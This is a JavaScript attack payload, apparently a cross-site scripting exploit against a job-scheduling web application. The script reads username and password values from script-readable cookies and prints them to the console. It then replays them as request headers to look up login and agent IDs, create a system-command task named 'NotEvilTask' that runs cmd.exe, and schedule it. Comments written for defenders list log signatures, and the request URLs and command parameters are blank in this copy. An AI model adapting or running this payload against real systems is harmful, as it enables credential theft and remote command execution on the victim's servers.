// Browser-side payload: harvests a username/password pair from two script-readable
// cookies, replays them as `login` / `password` request headers on four synchronous
// XMLHttpRequests (the request URLs are blank in this copy), creates a TASK_SYSCMD
// definition whose command is cmd.exe, and then schedules it.
// Defender notes, grounded in the code below:
//  - The credentials come from plaintext cookies named 'CurUserName' / 'CurPassword';
//    script access to them is what this depends on (HttpOnly / non-credential cookies
//    would remove that read). Both values are also echoed to the console.
//  - Every request carries the same fixed Firefox 78 User-Agent string, a `zUID`
//    header built from the constant prefix '280a012d-0c29-4e2d-9bb8-' plus 12
//    Math.random() characters, and `login` / `password` headers. These are stable
//    fields to alert on in request logs.
//  - The created definition is named 'NotEvilTask', has subType 'TASK_SYSCMD',
//    command 'cmd.exe' and startDir 'C:/windows/system32'; the schedule call hits
//    '/oc_main/zenaweb/definitions/<id>/operation?operation=schedule'. Any audit
//    trail of definition creation / scheduling will show these values.
console.log('Starting Payload..');
var d = new Date(); // client clock; only used to build the schedule date at the end
userCookie = 'CurUserName'; // implicit globals (no var/let) — they leak onto window
pwdCookie= 'CurPassword';
var ca = document.cookie.split(';'); // unused at this scope; readCookie() re-splits below

// Return the raw value of cookie `name` from document.cookie, or null if no cookie
// starts with `name=`. Leading spaces after each ';' are stripped; the value itself
// is not decoded here (the caller decodes only the username).
function readCookie(name) {
  var nameEQ = name + '=';
  var ca = document.cookie.split(';');
  for(var i=0;i < ca.length;i++) {
    var c = ca[i];
    while (c.charAt(0)==' ') c = c.substring(1,c.length);
    if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
  }
  return null;
}

// Build a string of `length` characters drawn from A-Z and 0-9 using Math.random()
// (not cryptographically random). Used for the zUID header suffix and the task uid.
function makeid(length) {
  var result = '';
  var characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
  var charactersLength = characters.length;
  for ( var i = 0; i < length; i++ ) {
    result += characters.charAt(Math.floor(Math.random() * charactersLength));
  }
  return result;
}

// Debounce helper: one shared timer id in the closure; each call cancels the
// previously pending callback and schedules `callback` after `ms` milliseconds.
var delay = ( function() {
  var timer = 0;
  return function(callback, ms) {
    clearTimeout (timer);
    timer = setTimeout(callback, ms);
  };
})();

// Credential read: username is URL-decoded, password is taken as-is. Both are
// implicit globals and both are written to the console in plaintext.
username = decodeURIComponent(readCookie(userCookie));
passwd = readCookie(pwdCookie);
console.log(username + '/' + passwd);

// Get OS Login UID
// Request 1. open() receives empty strings for method and URL in this copy; the
// third argument `false` makes the XHR synchronous. The response is assumed to be
// JSON shaped like { items: [ { name, uid }, ... ] } — TODO confirm against the API.
console.log('[+] Grabbing Login IDs');
var req = new XMLHttpRequest();
req.open('', '', false);
req.setRequestHeader('Accept', '*/*');
req.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
req.setRequestHeader('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'); // fixed UA — log signature
req.setRequestHeader('Accept-Language', 'en-US,en;q=0.5');
req.setRequestHeader('zUID', '280a012d-0c29-4e2d-9bb8-' + makeid(12)); // constant prefix + 12 random chars
req.setRequestHeader('Content-Type', 'application/json');
req.setRequestHeader('login', username); // harvested credentials sent as plain headers
req.setRequestHeader('password', passwd);
req.send();
var responseData = JSON.parse(req.responseText);
var loginName = responseData.items[0].name;
var loginUID = responseData.items[0].uid;
// Grab OS Login UID
console.log('[+] OS Login UID Found: ' + loginUID);

// Get Agent UID
// Request 2: same headers and blank URL as request 1; first item's name/uid are
// kept as the agent identity used in the task definition below.
console.log('[+] Grabbing Agent IDs');
var req = new XMLHttpRequest();
req.open('', '', false);
req.setRequestHeader('Accept', '*/*');
req.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
req.setRequestHeader('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0');
req.setRequestHeader('Accept-Language', 'en-US,en;q=0.5');
req.setRequestHeader('zUID', '280a012d-0c29-4e2d-9bb8-' + makeid(12));
req.setRequestHeader('Content-Type', 'application/json');
req.setRequestHeader('login', username);
req.setRequestHeader('password', passwd);
req.send();
var responseData = JSON.parse(req.responseText);
var agentName = responseData.items[0].name;
var agentUID = responseData.items[0].uid;
// Grab Agent UID (the log line below prints loginUID, not agentUID)
console.log('[+] Agent UID and Name Found: ' + loginUID + ' ' + agentName);

// Create Task Definition
// Request 3: the definition body is JSON assembled by string concatenation; agentName,
// agentUID, loginName, loginUID and cmd are interpolated without escaping. `cmd` is the
// empty string in this copy, so the definition carries no command parameters. Fixed
// values worth indexing in an audit trail: name 'NotEvilTask', subType 'TASK_SYSCMD',
// command 'cmd.exe', startDir 'C:/windows/system32', folder 'Definitions'.
console.log('[+] Executing Task Creation');
var response = ''; // unused
var cmd = '';
var req = new XMLHttpRequest();
req.open('', '', false);
req.setRequestHeader('Accept', '*/*');
req.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
req.setRequestHeader('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0');
req.setRequestHeader('Accept-Language', 'en-US,en;q=0.5');
req.setRequestHeader('zUID', '280a012d-0c29-4e2d-9bb8-' + makeid(12));
req.setRequestHeader('Content-Type', 'application/json');
req.setRequestHeader('login', username);
req.setRequestHeader('password', passwd);
req.send('{"id":0,"name":"NotEvilTask","uid":"' + makeid(12) + '","enabled":true,"description":"","type":"TASK","subType":"TASK_SYSCMD","agent":{"type":"REMOTE","id":1,"name":"' + agentName + '","uid":"' + agentUID + '"},"attributes":{"exitCodes":"0","isCommandScript":false,"command":"cmd.exe","parameters":"' + cmd + '","startDir":"C:/windows/system32","loadProfile":true},"folder":{"id":2,"name":"Definitions"},"simulate":{"simulateTaskRun":false,"duration":0},"login":{"name":"' + loginName + '","uid":"' + loginUID + '","id":12},"output":{"return":false,"interleave":false,"accumulate":false,"readFromFile":false,"filename":"","format":"","amountType":"","amount":0,"xslStyleSheet":"","stdoutToFile":false,"stdoutAppend":false,"stdoutFilename":"","stderrToFile":false,"stderrAppend":false,"stderrFilename":""},"variables":[],"resources":[],"actions":[]}');
console.log('[+] Success'); // logged unconditionally; no status check is made
var responseData = JSON.parse(req.responseText);
console.log('Data: ' + JSON.stringify(responseData,null,2));
var taskID = responseData.definition.id; // response assumed to carry definition.id — TODO confirm
// Grab gen ID
console.log('[+] Grabbed ID: ' + taskID);

// Execute Task
// Request 4: the base URL is an empty string here; the path is
// '/oc_main/zenaweb/definitions/' + taskID + '/operation?operation=schedule'.
// The schedule body uses a hard-coded year '2022' plus the client's month/day and a
// fixed time of 01.01.01; send() is deferred by 3000 ms through delay().
console.log('[+] Executing Task');
var req = new XMLHttpRequest();
req.open('', '' + '/oc_main/zenaweb/definitions/' + taskID + '/operation?operation=schedule', false);
req.setRequestHeader('Accept', '*/*');
req.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
req.setRequestHeader('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0');
req.setRequestHeader('Accept-Language', 'en-US,en;q=0.5');
req.setRequestHeader('zUID', '280a012d-0c29-4e2d-9bb8-' + makeid(12));
req.setRequestHeader('Content-Type', 'application/json');
req.setRequestHeader('login', username);
req.setRequestHeader('password', passwd);
delay(function(){
  req.send('{"schedDate":"' + '2022' + '.' + ('0' + (d.getMonth() + 1)).slice(-2) + '.' + ('0' + d.getDate()).slice(-2) + '","schedTime":"' + '01' + '.' + '01' + '.' + '01' + '","startOnHold":false,"perpetual":false,"skipTriggers":null}');
}, 3000 );
// end delay
var responseData = JSON.parse(req.responseText); // parses whatever responseText holds at this point
console.log('Data: ' + JSON.stringify(responseData,null,2));
console.log('[+] Task Executed Successfully'); // logged unconditionally